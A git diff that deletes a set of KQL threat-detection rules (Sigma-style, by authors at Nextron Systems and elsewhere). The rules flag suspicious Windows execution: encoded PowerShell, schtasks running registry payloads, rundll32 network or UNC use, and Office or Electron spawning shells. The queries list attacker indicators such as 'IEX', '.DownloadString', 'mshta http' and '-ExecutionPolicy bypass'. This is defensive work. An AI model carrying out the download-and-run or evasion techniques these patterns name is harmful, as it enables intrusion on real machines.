-DeviceProcessEvents -| where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file 
diff --git a/Execution/Rundll32_Execution_Without_Parameters.kql b/Execution/Rundll32_Execution_Without_Parameters.kql deleted file mode 100644 index 6fb33be4..00000000 --- a/Execution/Rundll32_Execution_Without_Parameters.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Bartlomiej Czyz, Relativity -// Date: 2021/01/31 -// Level: high -// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module -// Tags: attack.lateral_movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002 -DeviceProcessEvents -| where ProcessCommandLine in~ ("rundll32.exe", "rundll32") \ No newline at end of file diff --git a/Execution/Rundll32_Internet_Connection.kql b/Execution/Rundll32_Internet_Connection.kql deleted file mode 100644 index 2acd0757..00000000 --- a/Execution/Rundll32_Internet_Connection.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/11/04
-// Level: medium
-// Description: Detects a rundll32 that communicates with public IP addresses
-// Tags: attack.defense_evasion, attack.t1218.011, attack.execution
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe"))))
\ No newline at end of file
diff --git a/Execution/Rundll32_UNC_Path_Execution.kql b/Execution/Rundll32_UNC_Path_Execution.kql
deleted file mode 100644
index 17761d13..00000000
--- a/Execution/Rundll32_UNC_Path_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects rundll32 execution where the DLL is located on a remote location (share)
-// Tags: attack.defense_evasion, attack.execution, attack.t1021.002, attack.t1218.011
-DeviceProcessEvents
-| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql b/Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql
deleted file mode 100644
index 8cf3471a..00000000
--- a/Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.communitly
-// Date: 2020/10/13
-// Level: medium
-// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe"))
\ No newline at end of file
diff --git a/Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql b/Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
deleted file mode 100644
index 0ea2e752..00000000
--- a/Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/01/16
-// Level: low
-// Description: Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005, attack.s0111, car.2013-08-001, stp.1u
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe") and (not((AccountName contains "AUTHORI" or AccountName contains "AUTORI")))
\ No newline at end of file
diff --git a/Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql b/Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql
deleted file mode 100644
index 3d746a96..00000000
--- a/Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport, X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/02/12
-// Level: high
-// Description: Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand") and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/Execution/Scheduled_Task_Executing_Payload_from_Registry.kql b/Execution/Scheduled_Task_Executing_Payload_from_Registry.kql
deleted file mode 100644
index 0e49c7fb..00000000
--- a/Execution/Scheduled_Task_Executing_Payload_from_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/18
-// Level: medium
-// Description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
-// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/Create" and (ProcessCommandLine contains "Get-ItemProperty" or ProcessCommandLine contains " gp ") and (ProcessCommandLine contains "HKCU:" or ProcessCommandLine contains "HKLM:" or ProcessCommandLine contains "registry::" or ProcessCommandLine contains "HKEY_") and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")) and (not((ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "encodedcommand")))
\ No newline at end of file
diff --git a/Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql b/Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql
deleted file mode 100644
index c68909e4..00000000
--- a/Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: high
-// Description: Detects the creation or update of a scheduled task to run with "NT AUTHORITY\SYSTEM" privileges
-// Tags: attack.execution, attack.persistence, attack.t1053.005
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " /change " or ProcessCommandLine contains " /create ") and FolderPath endswith "\\schtasks.exe") and ProcessCommandLine contains "/ru " and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ")) and (not(((ProcessCommandLine contains "/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR " or ProcessCommandLine contains ":\\Program Files (x86)\\Avira\\System Speedup\\setup\\avira_speedup_setup.exe" or ProcessCommandLine contains "/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST") or ((ProcessCommandLine contains "/TN TVInstallRestore" and ProcessCommandLine contains "\\TeamViewer_.exe") and FolderPath endswith "\\schtasks.exe"))))
\ No newline at end of file
diff --git a/Execution/Schtasks_From_Suspicious_Folders.kql b/Execution/Schtasks_From_Suspicious_Folders.kql
deleted file mode 100644
index 7ef23c76..00000000
--- a/Execution/Schtasks_From_Suspicious_Folders.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/04/15
-// Level: high
-// Description: Detects scheduled task creations that have suspicious action command and folder combinations
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "%ProgramData%") and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ") and ProcessCommandLine contains " /create " and (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe")
\ No newline at end of file
diff --git a/Execution/Script_Event_Consumer_Spawning_Process.kql b/Execution/Script_Event_Consumer_Spawning_Process.kql
deleted file mode 100644
index f27035e7..00000000
--- a/Execution/Script_Event_Consumer_Spawning_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sittikorn S
-// Date: 2021/06/21
-// Level: high
-// Description: Detects a suspicious child process of Script Event Consumer (scrcons.exe).
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msbuild.exe") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql b/Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql
deleted file mode 100644
index ce37fdfb..00000000
--- a/Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/02/08
-// Level: high
-// Description: Detects a suspicious script execution in temporary folders or folders accessible by environment variables
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -ep bypass " or ProcessCommandLine contains " -ExecutionPolicy bypass " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains "/e:javascript " or ProcessCommandLine contains "/e:Jscript " or ProcessCommandLine contains "/e:vbscript ") or (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "mshta.exe", "wscript.exe"))) and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\")))
\ No newline at end of file
diff --git a/Execution/Service_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Service_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 28498146..00000000
--- a/Execution/Service_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/14
-// Level: medium
-// Description: An adversary might use WMI to check if a certain remote service is running on a remote device.
-When the test completes, a service information will be displayed on the screen if it exists.
-A common feedback message is that "No instance(s) Available" if the service queried is not running.
-A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreachable
-
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains "service" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql b/Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql
deleted file mode 100644
index c22f6141..00000000
--- a/Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/04
-// Level: medium
-// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
-// Tags: attack.execution, attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE")
\ No newline at end of file
diff --git a/Execution/Service_StartupType_Change_Via_Sc.EXE.kql b/Execution/Service_StartupType_Change_Via_Sc.EXE.kql
deleted file mode 100644
index dc89c692..00000000
--- a/Execution/Service_StartupType_Change_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: medium
-// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
-// Tags: attack.execution, attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql b/Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql
deleted file mode 100644
index 572e8c51..00000000
--- a/Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/11/24
-// Level: high
-// Description: Detects shell32.dll executing a DLL in a suspicious directory
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Execution/Start_Windows_Service_Via_Net.EXE.kql b/Execution/Start_Windows_Service_Via_Net.EXE.kql
deleted file mode 100644
index 2357f3be..00000000
--- a/Execution/Start_Windows_Service_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/21
-// Level: low
-// Description: Detects the usage of the "net.exe" command to start a service using the "start" flag
-// Tags: attack.execution, attack.t1569.002
-DeviceProcessEvents
-| where ProcessCommandLine contains " start " and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql b/Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql
deleted file mode 100644
index 03b12aec..00000000
--- a/Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jason Lynch
-// Date: 2019/04/02
-// Level: high
-// Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
-// Tags: attack.execution, attack.t1204.002, attack.g0046, car.2013-05-002
-DeviceProcessEvents
-| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\users\\" and (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.exe" or InitiatingProcessFolderPath endswith "\\EQNEDT32.exe")) and (not(FolderPath endswith "\\Teams.exe"))
\ No newline at end of file
diff --git a/Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql b/Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql
deleted file mode 100644
index d6006a54..00000000
--- a/Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/16
-// Level: high
-// Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
-// Tags: attack.execution, attack.t1059.005, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\PerfLogs\\")) and (InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe")
\ No newline at end of file
diff --git a/Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql b/Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql
deleted file mode 100644
index e2eb0ec4..00000000
--- a/Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/23
-// Level: high
-// Description: Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands
-// Tags: attack.execution, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (((ProcessCommandLine contains "/sc minute " or ProcessCommandLine contains "/ru system ") and (ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r ")) or (ProcessCommandLine contains " -decode " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -w hidden " or ProcessCommandLine contains " bypass " or ProcessCommandLine contains " IEX" or ProcessCommandLine contains ".DownloadData" or ProcessCommandLine contains ".DownloadFile" or ProcessCommandLine contains ".DownloadString" or ProcessCommandLine contains "/c start /min " or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "mshta http" or ProcessCommandLine contains "mshta.exe http") or ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%") and (ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "wscript")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Csi.exe_Usage.kql b/Execution/Suspicious_Csi.exe_Usage.kql
deleted file mode 100644
index ea5c49ee..00000000
--- a/Execution/Suspicious_Csi.exe_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Konstantin Grishchenko, oscd.community
-// Date: 2020/10/17
-// Level: medium
-// Description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
-// Tags: attack.execution, attack.t1072, attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessVersionInfoCompanyName =~ "Microsoft Corporation" and ((FolderPath endswith "\\csi.exe" or FolderPath endswith "\\rcsi.exe") or (ProcessVersionInfoOriginalFileName in~ ("csi.exe", "rcsi.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Electron_Application_Child_Processes.kql b/Execution/Suspicious_Electron_Application_Child_Processes.kql
deleted file mode 100644
index 81ee345f..00000000
--- a/Execution/Suspicious_Electron_Application_Child_Processes.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/21
-// Level: medium
-// Description: Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
-
-// Tags: attack.execution
-DeviceProcessEvents
-| where (InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\discord.exe" or InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe" or InitiatingProcessFolderPath endswith "\\keybase.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\slack.exe" or InitiatingProcessFolderPath endswith "\\Teams.exe") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\")) and (not(((FolderPath endswith "\\chrome.exe" and InitiatingProcessFolderPath endswith "\\chrome.exe") or (FolderPath endswith "\\discord.exe" and InitiatingProcessFolderPath endswith "\\discord.exe") or (FolderPath endswith "\\GitHubDesktop.exe" and InitiatingProcessFolderPath endswith "\\GitHubDesktop.exe") or (FolderPath endswith "\\keybase.exe" and InitiatingProcessFolderPath endswith "\\keybase.exe") or (FolderPath endswith "\\msedge.exe" and InitiatingProcessFolderPath endswith "\\msedge.exe") or (FolderPath endswith "\\msedgewebview2.exe" and InitiatingProcessFolderPath endswith
"\\msedgewebview2.exe") or (FolderPath endswith "\\msteams.exe" and InitiatingProcessFolderPath endswith "\\msteams.exe") or (FolderPath endswith "\\slack.exe" and InitiatingProcessFolderPath endswith "\\slack.exe") or (FolderPath endswith "\\teams.exe" and InitiatingProcessFolderPath endswith "\\teams.exe") or (FolderPath in~ ("C:\\Windows\\SysWOW64\\WerFault.exe", "C:\\Windows\\System32\\WerFault.exe"))))) and (not((ProcessCommandLine contains "\\NVSMI\\nvidia-smi.exe" and InitiatingProcessFolderPath endswith "\\Discord.exe")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql b/Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql
deleted file mode 100644
index c8bc79a5..00000000
--- a/Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/03/01
-// Level: high
-// Description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"
-// Tags: attack.execution, attack.defense_evasion, attack.t1059.001, attack.t1027
-DeviceProcessEvents
-| where ProcessCommandLine contains "OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvACIAKwAiAGEAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ" or ProcessCommandLine contains "oAOgAoACIATABvAGEAIgArACIAZAAiACkA" or ProcessCommandLine contains "6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA" or ProcessCommandLine contains "OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvACcAKwAnAGEAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA" or ProcessCommandLine contains "OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ" or ProcessCommandLine contains "oAOgAoACcATABvAGEAJwArACcAZAAnACkA" or ProcessCommandLine contains "6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA"
\ No newline at end of file
diff --git a/Execution/Suspicious_Encoded_PowerShell_Command_Line.kql b/Execution/Suspicious_Encoded_PowerShell_Command_Line.kql
deleted file mode 100644
index 28b221a3..00000000
--- a/Execution/Suspicious_Encoded_PowerShell_Command_Line.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
-// Date: 2018/09/03
-// Level: high
-// Description: Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains " JAB" or ProcessCommandLine contains " SUVYI" or ProcessCommandLine contains " SQBFAFgA" or ProcessCommandLine contains " aQBlAHgA" or ProcessCommandLine contains " aWV4I" or ProcessCommandLine contains " IAA" or ProcessCommandLine contains " IAB" or ProcessCommandLine contains " UwB" or ProcessCommandLine contains " cwB") and ProcessCommandLine contains " -e") or (ProcessCommandLine contains ".exe -ENCOD " or ProcessCommandLine contains " BA^J e-")) and (not(ProcessCommandLine contains " -ExecutionPolicy remotesigned "))
\ No newline at end of file
diff --git a/Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql b/Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql
deleted file mode 100644
index dcbabf9d..00000000
--- a/Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/14
-// Level: high
-// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) execution location.
-// Tags: attack.execution
-DeviceProcessEvents
-| where FolderPath endswith "\\wermgr.exe" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Execution/Suspicious_Execution_of_Powershell_with_Base64.kql b/Execution/Suspicious_Execution_of_Powershell_with_Base64.kql
deleted file mode 100644
index 5ee1184e..00000000
--- a/Execution/Suspicious_Execution_of_Powershell_with_Base64.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/02
-// Level: medium
-// Description: Commandline to launch powershell with a base64 payload
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -enc " or ProcessCommandLine contains " -enco" or ProcessCommandLine contains " -ec ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (not(((InitiatingProcessFolderPath contains "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or InitiatingProcessFolderPath contains "\\gc_worker.exe") or ProcessCommandLine contains " -Encoding ")))
\ No newline at end of file
